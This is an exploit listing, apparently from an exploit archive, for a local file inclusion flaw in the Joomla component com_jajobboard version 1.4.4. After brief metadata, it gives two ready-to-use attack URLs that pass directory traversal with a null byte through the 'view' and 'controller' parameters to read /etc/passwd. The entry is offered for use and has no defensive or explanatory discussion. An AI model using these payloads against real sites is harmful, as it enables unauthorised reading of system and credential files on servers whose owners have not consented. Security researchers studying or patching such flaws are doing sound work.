id: 11717
date: 04/11/2010
title: Joomla Component com_jajobboard Multiple LFI Vulnerability
author: AntiSecurity
cves: 

==========================================================
Joomla Component com_jajobboard Multiple LFI Vulnerability
==========================================================

# Exploit Title:
Joomla Component JA Job Board Multiple LFI Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://jobboard.joomlart.com/
 
# Version:
com_jajobboard version 1.4.4
 
# Tested on:
Linux
 
# Target example
http://server/index.php?option=com_jajobboard&view=../../../../../../../../../../../../../../../etc/passwd%00
http://server/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-24]  #